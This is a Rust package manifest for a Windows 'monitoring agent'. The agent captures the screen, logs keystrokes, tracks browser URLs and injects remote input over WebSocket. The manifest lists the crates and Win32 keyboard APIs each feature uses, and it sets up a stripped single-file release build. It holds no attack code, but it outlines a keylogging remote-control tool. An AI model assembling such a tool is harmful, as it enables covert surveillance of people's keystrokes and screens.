[package]
name        = "win-rust-client"
version     = "0.1.0"
edition     = "2021"
description = "Windows monitoring agent – screen capture, keylogging, URL tracking, and remote input injection over WebSocket"
authors     = ["win-rust-client"]

# Windows-only binary.  Cross-compile from Linux with:
#   cargo xwin build --release
[[bin]]
name = "win-rust-client"
path = "src/main.rs"

# ─────────────────────────────────────────────────────────────────────────────
# Dependencies
# ─────────────────────────────────────────────────────────────────────────────
[dependencies]

# ── Async runtime ─────────────────────────────────────────────────────────────
tokio        = { version = "1",    features = ["full"] }
futures-util = "0.3"

# ── WebSocket ─────────────────────────────────────────────────────────────────
# native-tls enables wss:// support (bring-your-own cert store).
tokio-tungstenite = { version = "0.24", features = ["native-tls"] }
tungstenite       = { version = "0.24", default-features = false }

# ── Screen capture (Windows Graphics Capture API) ─────────────────────────────
windows-capture = "1"

# ── JPEG encoding ─────────────────────────────────────────────────────────────
image = { version = "0.25", default-features = false, features = ["jpeg"] }

# ── Browser URL scraping ──────────────────────────────────────────────────────
# Patched locally to remove two debug println!s (see patches/browser-url/).
browser-url = "0.1"

# ── Input injection ───────────────────────────────────────────────────────────
enigo = "0.2"

# ── Windows API ───────────────────────────────────────────────────────────────
# windows-capture already pulls this in transitively; declared explicitly so
# we can use the Win32 sub-modules directly.
windows = { version = "0.58", features = [
    "Win32_Foundation",
    "Win32_UI_WindowsAndMessaging",
    "Win32_System_Threading",            # OpenProcess, QueryFullProcessImageNameW
    "Win32_UI_Input_KeyboardAndMouse",   # VK_* constants, GetAsyncKeyState, ToUnicodeEx, GetLastInputInfo
] }

# ── Serialisation ─────────────────────────────────────────────────────────────
serde      = { version = "1", features = ["derive"] }
serde_json = "1"

# ── Logging ───────────────────────────────────────────────────────────────────
tracing            = "0.1"
tracing-subscriber = { version = "0.3", features = ["env-filter"] }

# ── Error handling ────────────────────────────────────────────────────────────
anyhow    = "1"
thiserror = "1"

# ─────────────────────────────────────────────────────────────────────────────
# Local patches
# ─────────────────────────────────────────────────────────────────────────────
# browser-url 0.1.1 ships with two hardcoded debug println!s in its Windows
# backend.  The patch is a verbatim copy of the crate with those two lines
# removed — no other changes.
[patch.crates-io]
browser-url = { path = "patches/browser-url" }

# ─────────────────────────────────────────────────────────────────────────────
# Release profile – small, fast, single-file binary
# ─────────────────────────────────────────────────────────────────────────────
[profile.release]
opt-level     = 3
lto           = true
codegen-units = 1
strip         = true
panic         = "abort"
